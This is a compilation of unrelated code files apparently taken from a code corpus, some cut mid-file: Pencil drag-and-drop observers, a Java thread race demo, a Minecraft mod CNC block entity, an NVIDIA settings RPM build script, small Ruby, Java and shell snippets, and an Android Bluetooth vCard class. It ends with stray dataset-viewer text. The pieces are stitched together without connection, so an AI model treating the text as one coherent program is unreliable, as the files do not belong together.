SVGDragObserver.prototype = {
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("image/svg+xml");
return flavours;
},
onDragOver: function (evt, flavour, session){},
onDrop: function (evt, transferData, session) {
var svg = transferData.data;
var loc = this.canvas.getEventLocation(evt, "withoutZoom");
FileDragObserver.handleSVGData(svg, this.canvas, loc);
}
};
Pencil.registerDragObserver(SVGDragObserver);
function PNGDragObserver(canvas) {
this.canvas = canvas;
}
PNGDragObserver.prototype = {
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("pencil/png");
return flavours;
},
onDragOver: function (evt, flavour, session){},
onDrop: function (evt, transferData, session) {
var url = transferData.data;
var loc = this.canvas.getEventLocation(evt, "withoutZoom");
this._handleImageFile(this.canvas, url, loc, "transparent");
},
_handleImageFile: function (canvas, url, loc, transparent) {
try {
var def = CollectionManager.shapeDefinition.locateDefinition(PNGImageXferHelper.SHAPE_DEF_ID);
if (!def) return;
if (Config.get("document.EmbedImages") == null) {
Config.set("document.EmbedImages", false);
}
var embedImages = Config.get("document.EmbedImages")
canvas.insertShape(def, new Bound(loc.x, loc.y, null, null));
if (!canvas.currentController) return;
var controller = canvas.currentController;
var handler = function (imageData) {
var w = imageData.w;
var h = imageData.h;
var maxWidth = Config.get("clipartbrowser.scale.width");
var maxHeight = Config.get("clipartbrowser.scale.height");
if (!maxWidth) {
maxWidth = 200;
Config.set("clipartbrowser.scale.width", 200);
}
if (!maxHeight) {
maxHeight = 200;
Config.set("clipartbrowser.scale.height", 200);
}
if (Config.get("clipartbrowser.scale") == true && (w > maxWidth || h > maxHeight)) {
if (w > h) {
h = h / (w / maxWidth);
w = maxWidth;
} else {
w = w / (h / maxHeight);
h = maxHeight;
}
}
var dim = new Dimension(w, h);
controller.setProperty("imageData", imageData);
controller.setProperty("box", dim);
if (transparent) {
controller.setProperty("fillColor", Color.fromString("#ffffff00"));
}
};
if (!embedImages) {
ImageData.fromUrl(url, handler);
} else {
ImageData.fromUrlEmbedded(url, handler);
}
canvas.invalidateEditors();
} catch (e) {
Console.dumpError(e);
}
}
};
Pencil.registerDragObserver(PNGDragObserver);
|
<gh_stars>0
public class FirstBlood {
public static int count = 0;
public static void main(String args[]) {
int numberofThreads = 10000;
A[] threads = new A[numberofThreads];
for (int i = 0; i < numberofThreads; i++) {
threads[i] = new A();
threads[i].start();
}
try {
for (int i = 0; i < numberofThreads; i++) {
threads[i].join();
}
} catch (InterruptedException e) {
System.out.println("some thread is not finished");
}
System.out.print("The result is ... ");
System.out.print("wait for it ... ");
System.out.println(count);
}
}
class A extends Thread {
public void run() {
FirstBlood.count++;
}
}
|
<filename>src/main/java/malte0811/controlengineering/blockentity/panels/PanelCNCBlockEntity.java
package malte0811.controlengineering.blockentity.panels;
import blusunrize.immersiveengineering.api.utils.CapabilityReference;
import com.google.common.collect.ImmutableList;
import malte0811.controlengineering.blockentity.MultiblockBEType;
import malte0811.controlengineering.blockentity.base.CEBlockEntity;
import malte0811.controlengineering.blockentity.base.IExtraDropBE;
import malte0811.controlengineering.blockentity.bus.ParallelPort;
import malte0811.controlengineering.blockentity.tape.TapeDrive;
import malte0811.controlengineering.blocks.CEBlocks;
import malte0811.controlengineering.blocks.panels.PanelCNCBlock;
import malte0811.controlengineering.blocks.shapes.ListShapes;
import malte0811.controlengineering.blocks.shapes.SelectionShapeOwner;
import malte0811.controlengineering.blocks.shapes.SelectionShapes;
import malte0811.controlengineering.blocks.shapes.SingleShape;
import malte0811.controlengineering.bus.BusState;
import malte0811.controlengineering.bus.IBusInterface;
import malte0811.controlengineering.bus.MarkDirtyHandler;
import malte0811.controlengineering.client.render.utils.PiecewiseAffinePath;
import malte0811.controlengineering.controlpanels.PlacedComponent;
import malte0811.controlengineering.controlpanels.cnc.CNCInstructionParser;
import malte0811.controlengineering.items.PanelTopItem;
import malte0811.controlengineering.items.PunchedTapeItem;
import malte0811.controlengineering.util.*;
import malte0811.controlengineering.util.math.MatrixUtils;
import net.minecraft.Util;
import net.minecraft.core.BlockPos;
import net.minecraft.core.Direction;
import net.minecraft.nbt.CompoundTag;
import net.minecraft.world.InteractionResult;
import net.minecraft.world.item.ItemStack;
import net.minecraft.world.item.context.UseOnContext;
import net.minecraft.world.level.block.entity.BlockEntityType;
import net.minecraft.world.level.block.state.BlockState;
import net.minecraft.world.phys.AABB;
import net.minecraft.world.phys.Vec3;
import net.minecraft.world.phys.shapes.Shapes;
import net.minecraftforge.common.capabilities.Capability;
import net.minecraftforge.common.util.LazyOptional;
import net.minecraftforge.energy.CapabilityEnergy;
import net.minecraftforge.energy.EnergyStorage;
import net.minecraftforge.energy.IEnergyStorage;
import net.minecraftforge.items.CapabilityItemHandler;
import net.minecraftforge.items.IItemHandler;
import net.minecraftforge.registries.DeferredRegister;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.function.Consumer;
import static malte0811.controlengineering.util.ShapeUtils.createPixelRelative;
public class PanelCNCBlockEntity extends CEBlockEntity implements SelectionShapeOwner, IExtraDropBE, IBusInterface {
private static final int ENERGY_CONSUMPTION = 40;
private State state = State.EMPTY;
private final TapeDrive tape = new TapeDrive(
() -> setState(state.addTape()), () -> setState(state.removeTape()), () -> state.canTakeTape()
);
private final CachedValue<byte[], CNCJob> currentJob = new CachedValue<>(
tape::getNullableTapeContent,
tape -> {
if (tape != null) {
return CNCJob.createFor(CNCInstructionParser.parse(level, BitUtils.toString(tape)));
} else {
return null;
}
},
Arrays::equals,
b -> b == null ? null : Arrays.copyOf(b, b.length)
);
private int currentTicksInJob;
private final List<PlacedComponent> currentPlacedComponents = new ArrayList<>();
private final List<CapabilityReference<IItemHandler>> neighborInventories = Util.make(
new ArrayList<>(),
list -> {
for (Direction d : DirectionUtils.BY_HORIZONTAL_INDEX) {
list.add(CapabilityReference.forNeighbor(this, CapabilityItemHandler.ITEM_HANDLER_CAPABILITY, d));
}
}
);
private final EnergyStorage energy = new EnergyStorage(20 * ENERGY_CONSUMPTION);
private final MarkDirtyHandler markBusDirty = new MarkDirtyHandler();
private final ParallelPort dataOutput = new ParallelPort();
// Used and initialized by the renderer
public CachedValue<CNCJob, PiecewiseAffinePath<Vec3>> headPath;
private final CachedValue<Direction, SelectionShapes> bottomSelectionShapes = new CachedValue<>(
() -> getBlockState().getValue(PanelCNCBlock.FACING),
facing -> new ListShapes(
Shapes.block(),
MatrixUtils.inverseFacing(facing),
ImmutableList.of(
new SingleShape(createPixelRelative(1, 14, 1, 15, 16, 15), this::panelClick),
new SingleShape(createPixelRelative(2, 4, 14, 14, 12, 16), tape::click),
new SingleShape(
createPixelRelative(4, 4, 0, 12, 12, 1),
dataOutput.makeRemapInteraction(this)
)
),
ctx -> InteractionResult.PASS
)
);
private static final SelectionShapes topSelectionShapes = new SingleShape(
PanelCNCBlock.UPPER_SHAPE, $ -> InteractionResult.PASS
);
public PanelCNCBlockEntity(BlockEntityType<?> type, BlockPos pos, BlockState state) {
super(type, pos, state);
}
private InteractionResult panelClick(UseOnContext ctx) {
if (level == null) {
return InteractionResult.PASS;
}
if (state.canTakePanel()) {
if (!level.isClientSide && ctx.getPlayer() != null) {
ItemStack result = PanelTopItem.createWithComponents(currentPlacedComponents);
ItemUtil.giveOrDrop(ctx.getPlayer(), result);
currentPlacedComponents.clear();
currentTicksInJob = 0;
setState(state.removePanel());
}
return InteractionResult.SUCCESS;
} else if (!state.hasPanel()) {
ItemStack heldItem = ctx.getItemInHand();
if (PanelTopItem.isEmptyPanelTop(heldItem)) {
if (!level.isClientSide) {
setState(state.addPanel());
heldItem.shrink(1);
}
return InteractionResult.SUCCESS;
}
}
return InteractionResult.FAIL;
}
public void clientTick() {
if (state == State.RUNNING) {
++currentTicksInJob;
}
}
public void tick() {
if (dataOutput.tickTX()) {
markBusDirty.run();
}
if (state.isInProcess()) {
if (energy.extractEnergy(ENERGY_CONSUMPTION, true) < ENERGY_CONSUMPTION) {
setState(State.NO_ENERGY);
return;
}
energy.extractEnergy(ENERGY_CONSUMPTION, false);
setState(State.RUNNING);
++currentTicksInJob;
int nextComponent = currentPlacedComponents.size();
CNCJob job = currentJob.get();
if (nextComponent < job.getTotalComponents()) {
if (!level.isClientSide && currentTicksInJob >= job.tickPlacingComponent().getInt(nextComponent)) {
PlacedComponent componentToPlace = job.components().get(nextComponent);
var componentCost = componentToPlace.getComponent().getType().getCost(level);
if (!ItemUtil.tryConsumeItemsFrom(componentCost, neighborInventories)) {
dataOutput.queueStringWithParity("Unable to consume items for component number " + nextComponent);
setState(State.FAILED);
} else {
currentPlacedComponents.add(componentToPlace);
BEUtil.markDirtyAndSync(this);
}
}
}
if (currentTicksInJob >= job.totalTicks()) {
if (job.error() != null) {
dataOutput.queueStringWithParity(job.error());
setState(State.FAILED);
} else {
setState(State.DONE);
}
}
}
}
@Override
public SelectionShapes getShape() {
if (getBlockState().getValue(PanelCNCBlock.UPPER)) {
return topSelectionShapes;
} else {
return bottomSelectionShapes.get();
}
}
@Nullable
public CNCJob getCurrentJob() {
return currentJob.get();
}
public int getTapeLength() {
return tape.getTapeLength();
}
public int getCurrentTicksInJob() {
return currentTicksInJob;
}
public List<PlacedComponent> getCurrentPlacedComponents() {
return currentPlacedComponents;
}
public State getState() {
return state;
}
@Override
public void saveAdditional(@Nonnull CompoundTag compound) {
super.saveAdditional(compound);
writeSyncedData(compound);
compound.put("energy", energy.serializeNBT());
compound.put("dataOutput", dataOutput.toNBT());
}
@Override
public void load(@Nonnull CompoundTag nbt) {
super.load(nbt);
readSyncedData(nbt);
energy.deserializeNBT(nbt.get("energy"));
dataOutput.readNBT(nbt.getCompound("dataOutput"));
}
@Override
protected void readSyncedData(CompoundTag compound) {
tape.loadNBT(compound.get("tape"));
currentTicksInJob = compound.getInt("currentTick");
state = State.VALUES[compound.getInt("state")];
currentPlacedComponents.clear();
var components = PlacedComponent.LIST_CODEC.fromNBT(compound.get("components"));
if (components != null) {
currentPlacedComponents.addAll(components);
}
}
@Override
protected void writeSyncedData(CompoundTag in) {
in.put("tape", tape.toNBT());
in.putInt("currentTick", currentTicksInJob);
in.putInt("state", state.ordinal());
in.put("components", PlacedComponent.LIST_CODEC.toNBT(currentPlacedComponents));
}
@Override
public void getExtraDrops(Consumer<ItemStack> dropper) {
if (tape.hasTape()) {
dropper.accept(PunchedTapeItem.withBytes(tape.getTapeContent()));
}
if (state.hasPanel()) {
dropper.accept(PanelTopItem.createWithComponents(currentPlacedComponents));
}
}
private final CachedValue<BlockPos, AABB> renderBB = new CachedValue<>(
() -> worldPosition, pos -> new AABB(
pos.getX(), pos.getY(), pos.getZ(),
pos.getX() + 1, pos.getY() + 2, pos.getZ() + 2
));
@Override
public AABB getRenderBoundingBox() {
return renderBB.get();
}
public static MultiblockBEType<PanelCNCBlockEntity, ?> register(DeferredRegister<BlockEntityType<?>> register) {
return MultiblockBEType.makeType(
register, "panel_cnc", PanelCNCBlockEntity::new, Dummy::new, CEBlocks.PANEL_CNC, PanelCNCBlock::isMaster
);
}
private void setState(State state) {
if (state != this.state) {
this.state = state;
BEUtil.markDirtyAndSync(this);
}
}
@Override
public void onBusUpdated(BusState totalState, BusState otherState) {
dataOutput.onBusStateChange(otherState);
setChanged();
}
@Override
public BusState getEmittedState() {
return dataOutput.getOutputState();
}
@Override
public boolean canConnect(Direction fromSide) {
return fromSide == getBlockState().getValue(PanelCNCBlock.FACING);
}
@Override
public void addMarkDirtyCallback(Clearable<Runnable> markDirty) {
this.markBusDirty.addCallback(markDirty);
}
@Override
public void setRemoved() {
super.setRemoved();
this.markBusDirty.run();
}
private static class Dummy extends CEBlockEntity {
private LazyOptional<IEnergyStorage> energyRef = null;
public Dummy(BlockEntityType<?> type, BlockPos pos, BlockState state) {
super(type, pos, state);
}
@Nonnull
@Override
public <T> LazyOptional<T> getCapability(@Nonnull Capability<T> cap, @Nullable Direction side) {
if (cap == CapabilityEnergy.ENERGY && CapabilityUtils.isNullOr(Direction.UP, side)) {
if (energyRef == null) {
if (level.getBlockEntity(worldPosition.below()) instanceof PanelCNCBlockEntity paneCNC) {
energyRef = CapabilityUtils.constantOptional(paneCNC.energy);
} else {
return LazyOptional.empty();
}
}
return energyRef.cast();
}
return super.getCapability(cap, side);
}
@Override
public void invalidateCaps() {
super.invalidateCaps();
if (energyRef != null) {
energyRef.invalidate();
}
}
}
public enum State {
EMPTY,
HAS_TAPE,
HAS_PANEL,
RUNNING,
NO_ENERGY,
FAILED,
DONE;
public static final State[] VALUES = values();
public boolean canTakePanel() {
return hasPanel() && !isInProcess();
}
public boolean hasPanel() {
return this == HAS_PANEL || this == RUNNING || this == NO_ENERGY || this == FAILED || this == DONE;
}
public boolean isInProcess() {
return this == RUNNING || this == NO_ENERGY;
}
public State removePanel() {
return switch (this) {
case HAS_PANEL -> EMPTY;
case FAILED, DONE -> HAS_TAPE;
default -> throw new RuntimeException(name());
};
}
public State addPanel() {
return switch (this) {
case EMPTY -> HAS_PANEL;
case HAS_TAPE -> RUNNING;
default -> throw new RuntimeException(name());
};
}
public State addTape() {
return switch (this) {
case EMPTY -> HAS_TAPE;
case HAS_PANEL -> RUNNING;
default -> throw new RuntimeException(name());
};
}
public boolean canTakeTape() {
return hasTape() && !isInProcess();
}
public State removeTape() {
return switch (this) {
case HAS_TAPE -> EMPTY;
case FAILED, DONE -> HAS_PANEL;
default -> throw new RuntimeException(name());
};
}
public boolean hasTape() {
return this == HAS_TAPE || this == RUNNING || this == NO_ENERGY || this == FAILED || this == DONE;
}
}
}
|
#!/usr/bin/env bash
runfile="$1"
distro="$2"
topdir="$HOME/nvidia-settings"
epoch="3"
[[ -n $OUTPUT ]] ||
OUTPUT="$HOME/rpm-nvidia"
[[ -n $distro ]] ||
distro=$(git rev-parse --abbrev-ref HEAD 2>/dev/null)
[[ $distro == "main" ]] && distro="rhel8"
drvname=$(basename "$runfile")
arch=$(echo "$drvname" | awk -F "-" '{print $3}')
version=$(echo "$drvname" | sed -e "s|NVIDIA\-Linux\-${arch}\-||" -e 's|\.run$||' -e 's|\-grid$||' -e 's|\.tar\..*||' -e 's|nvidia\-settings\-||')
drvbranch=$(echo "$version" | awk -F "." '{print $1}')
tarball="nvidia-settings-${version}"
err() { echo; echo "ERROR: $*"; exit 1; }
kmd() { echo; echo ">>> $*" | fold -s; eval "$*" || err "at line \`$*\`"; }
dep() { type -p "$1" >/dev/null || err "missing dependency $1"; }
lib() { local sofile=$(echo "$1" | sed 's|\-devel|\.sol|'); ldconfig -p | grep -q "$sofile" || err "missing library $1"; }
fetch_input() {
inputfile="${tarball}.tar.bz2"
# Download runfile
if [[ ! -f "$inputfile" ]]; then
dep wget
kmd wget "https://download.nvidia.com/XFree86/nvidia-settings/${tarball}.tar.bz2" -O "$inputfile"
fi
}
build_dnf_rpm()
{
mkdir -p "$topdir"
(cd "$topdir" && mkdir -p BUILD BUILDROOT RPMS SRPMS SOURCES SPECS)
cp -v -- *.desktop "$topdir/SOURCES/"
cp -v -- *.patch "$topdir/SOURCES/"
cp -v -- *.xml "$topdir/SOURCES/"
cp -v -- *settings*.tar* "$topdir/SOURCES/"
cp -v -- *.spec "$topdir/SPECS/"
cd "$topdir" || err "Unable to cd into $topdir"
kmd rpmbuild \
--define "'%_topdir $(pwd)'" \
--define "'debug_package %{nil}'" \
--define "'version $version'" \
--define "'epoch $epoch'" \
-v -bb SPECS/nvidia-settings.spec
cd - || err "Unable to cd into $OLDPWD"
}
build_yum_rpm()
{
mkdir -p "$topdir"
(cd "$topdir" && mkdir -p BUILD BUILDROOT RPMS SRPMS SOURCES SPECS)
cp -v -- *.desktop "$topdir/SOURCES/"
cp -v -- *.patch "$topdir/SOURCES/"
cp -v -- *.xml "$topdir/SOURCES/"
cp -v -- *settings*.tar* "$topdir/SOURCES/"
cp -v -- *.spec "$topdir/SPECS/"
if [[ -f "nvidia-settings-${version}.tar.gz" ]]; then
extension="gz"
elif [[ -f "nvidia-settings-${version}.tar.bz2" ]]; then
extension="bz2"
fi
#
# NOTE: this package is not branched, therefore regardless of flavor, the highest version installed by default.
#
# To install a specific version:
# list+=("nvidia-libXNVCtrl-$version")
# list+=("nvidia-libXNVCtrl-devel-$version")
# list+=("nvidia-settings-$version")
# sudo yum install ${list[@]}
flavor="latest-dkms"
is_latest=1
is_dkms=1
cd "$topdir" || err "Unable to cd into $topdir"
echo -e "\n:: flavor $flavor [$is_latest] [$is_dkms]"
kmd rpmbuild \
--define "'%_topdir $(pwd)'" \
--define "'debug_package %{nil}'" \
--define "'version $version'" \
--define "'driver_branch $flavor'" \
--define "'is_dkms $is_dkms'" \
--define "'is_latest $is_latest'" \
--define "'extension $extension'" \
--define "'epoch $epoch'" \
-v -bb SPECS/nvidia-settings.spec
cd - || err "Unable to cd into $OLDPWD"
}
build_wrapper()
{
echo ":: Building $distro packages"
if [[ $distro == "rhel7" ]]; then
build_yum_rpm
else
build_dnf_rpm
fi
}
# Download tarball
if [[ -f ${tarball}.tar.bz2 ]]; then
echo "[SKIP] fetch_input($version)"
elif [[ -f ${tarball}.tar.gz ]]; then
echo "[SKIP] fetch_input($version)"
else
echo "==> fetch_input($version)"
fetch_input
fi
# Sanity check
[[ -n $version ]] || err "version could not be determined"
# Build RPMs
empty=$(find "$topdir/RPMS" -maxdepth 0 -type d -empty 2>/dev/null)
found=$(find "$topdir/RPMS" -mindepth 2 -maxdepth 2 -type f -name "*${version}*" 2>/dev/null)
if [[ ! -d "$topdir/RPMS" ]] || [[ $empty ]] || [[ ! $found ]]; then
echo "==> build_rpm(${version})"
dep m4
dep gcc
dep rpmbuild
dep update-desktop-database
build_wrapper
else
echo "[SKIP] build_rpm(${version})"
fi
echo "---"
found=$(find "$topdir/RPMS" -mindepth 2 -maxdepth 2 -type f -name "*${version}*" 2>/dev/null)
for rpm in $found; do
echo "-> $(basename "$rpm")"
mkdir -p "$OUTPUT"
rsync -a "$rpm" "$OUTPUT"
done
|
# Batch running of Event Processing Agents (EPA) with test files
# By mikko.rinne@aalto.fi 20.1.2016
# Each individual EPA and the combination of all EPAs is executed on 1000 events
# Modify as needed to run other event files
echo -e "\n\n\nEPA1 (Stateless filter)"
./EPArun.sh EPA1 1000events
echo -e "\n\n\nEPA2 (Stateful filter)"
./EPArun.sh EPA2 1000events
echo -e "\n\n\nEPA3 (Enrich) local"
./EPArun.sh EPA3_local 1000events
echo -e "\n\n\nEPA4 (Project) - using input from EPA3 local"
./EPArun.sh EPA4 EPA3_1000events
echo -e "\n\n\nEPA5 (Split)"
./EPArun.sh EPA5 1000events
echo -e "\n\n\nEPA6 (Aggregate)"
./EPArun.sh EPA6 1000events
echo -e "\n\n\nEPA7 (Compose) - using input from EPA5, always cleanup-rule"
./EPA7run.sh EPA5_1000events
echo -e "\n\n\nEPA8 (Pattern detection) - always remove-policy"
./EPArun.sh EPA8 1000events
echo -e "\n\n\nEPA-All (Combination of all agents) - always remove-policy"
./EPArun.sh EPA-All 1000events
|
a = [[1, 2], [3, 4], [5, 6]]
def row_sum(arr)
result = []
arr.each do |subarr|
result << subarr.inject(0) { |sum, n| sum + n }
end
result
end
p row_sum(a) |
<reponame>Justice-love/tiger
/**
*
* @creatTime 下午8:11:12
* @author Eddy
*/
package tiger.test.superinject;
import javax.inject.Named;
/**
* @author Eddy
*
*/
@Named("phoenix")
public class Phoenix extends Animal {
public void phoenix() {
cow.cow();
}
}
|
#!/bin/bash
/usr/local/bin/metadata_svc_bugfix.sh
/usr/local/bin/file_edit_patch.sh
|
package io.opensphere.controlpanels.layers.base;
/**
* Interface to an object which will ask the user yes questions and return the
* user response.
*
*/
@FunctionalInterface
public interface UserConfirmer
{
/**
* Asks the user the specified question.
*
* @param question The question to ask the user.
* @param title The title of the question.
* @return True if the user responded yes, false if the user responded no.
*/
boolean askUser(String question, String title);
}
|
#!/bin/sh
# file: simulate_vcs.sh
#
# (c) Copyright 2008 - 2011 Xilinx, Inc. All rights reserved.
#
# This file contains confidential and proprietary information
# of Xilinx, Inc. and is protected under U.S. and
# international copyright and other intellectual property
# laws.
#
# DISCLAIMER
# This disclaimer is not a license and does not grant any
# rights to the materials distributed herewith. Except as
# otherwise provided in a valid license issued to you by
# Xilinx, and to the maximum extent permitted by applicable
# law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
# WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
# AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
# BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
# INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
# (2) Xilinx shall not be liable (whether in contract or tort,
# including negligence, or under any other theory of
# liability) for any loss or damage of any kind or nature
# related to, arising under or in connection with these
# materials, including for any direct, or any indirect,
# special, incidental, or consequential loss or damage
# (including loss of data, profits, goodwill, or any type of
# loss or damage suffered as a result of any action brought
# by a third party) even if such damage or loss was
# reasonably foreseeable or Xilinx had been advised of the
# possibility of the same.
#
# CRITICAL APPLICATIONS
# Xilinx products are not designed or intended to be fail-
# safe, or for use in any application requiring fail-safe
# performance, such as life-support or safety devices or
# systems, Class III medical devices, nuclear facilities,
# applications related to the deployment of airbags, or any
# other applications that could lead to death, personal
# injury, or severe property or environmental damage
# (individually and collectively, "Critical
# Applications"). Customer assumes the sole risk and
# liability of any use of Xilinx products in Critical
# Applications, subject only to applicable laws and
# regulations governing limitations on product liability.
#
# THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
# PART OF THIS FILE AT ALL TIMES.
#
# remove old files
rm -rf simv* csrc DVEfiles AN.DB
# compile all of the files
# Note that -sverilog is not strictly required- You can
# remove the -sverilog if you change the type of the
# localparam for the periods in the testbench file to
# [63:0] from time
vhdlan -xlrm ../../../clkGen.vhd \
../../example_design/clkGen_exdes.vhd \
../clkGen_tb.vhd
# prepare the simulation
vcs +vcs+lic+wait -xlrm -debug clkGen_tb
# run the simulation
./simv -xlrm -ucli -i ucli_commands.key
# launch the viewer
#dve -vpd vcdplus.vpd -session vcs_session.tcl
|
package com.roadrover.btservice.bluetooth;
import android.os.Parcel;
import android.os.Parcelable;
import android.text.TextUtils;
/**
* 蓝牙电话本,通话记录, 传递数据类
*/
public class BluetoothVCardBook implements Parcelable {
/**
* 编码类型
*/
public String codingType;
/**
* 名字
*/
public String name;
/**
* 类型,已拨或者未接等
*/
public String type;
/**
* 电话号码
*/
public String phoneNumber;
/**
* 通话记录,通话时间,时间为 20170109T211652 2017/01/09 21:16:52
*/
public String callTime;
protected BluetoothVCardBook(Parcel in) {
readFromParcel(in);
}
/**
* 创建电话本工具类
* @param codingType 编码类型
* @param name 名字
* @param type 类型 已拨或者未接等
* @param phoneNumber 电话号码
* @param callTime 通话记录,通话时间
* @return
*/
public static BluetoothVCardBook createVCardBook(String codingType, String name, String type, String phoneNumber, String callTime) {
BluetoothVCardBook book = CREATOR.createFromParcel(null);
book.codingType = codingType;
book.name = name;
book.type = type;
book.phoneNumber = phoneNumber;
book.callTime = callTime;
return book;
}
public static final Creator<BluetoothVCardBook> CREATOR = new Creator<BluetoothVCardBook>() {
@Override
public BluetoothVCardBook createFromParcel(Parcel in) {
return new BluetoothVCardBook(in);
}
@Override
public BluetoothVCardBook[] newArray(int size) {
return new BluetoothVCardBook[size];
}
};
@Override
public String toString() {
return "coding:" + codingType + " name:" + name +
" type:" + type + " number:" + phoneNumber +
" time:" + callTime;
}
@Override
public int describeContents() {
return 0;
}
@Override
public void writeToParcel(Parcel parcel, int i) {
parcel.writeString(codingType);
parcel.writeString(name);
parcel.writeString(type);
parcel.writeString(phoneNumber);
parcel.writeString(callTime);
}
public void readFromParcel(Parcel source) {
if (null != source) {
codingType = source.readString();
name = source.readString();
type = source.readString();
phoneNumber = source.readString();
callTime = source.readString();
}
}
/**
* 判断两条记录是否是同一条记录
* @param o
* @return 名字一样,并且电话号码一样,并且通话时间一样,认为是同一条,同一条返回 true
*/
@Override
public boolean equals(Object o) {
if (o == this) {
return true;
}
if (o != null && o instanceof BluetoothVCardBook) {
BluetoothVCardBook other = (BluetoothVCardBook) o;
if (TextUtils.equals(name, other.name) &&
TextUtils.equals(phoneNumber, other.phoneNumber)
&& TextUtils.equals(callTime, other.callTime)) {
return true;
}
}
return false;
}
@Override
public int hashCode() {
if (name != null) {
return name.hashCode();
}
return 0;
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.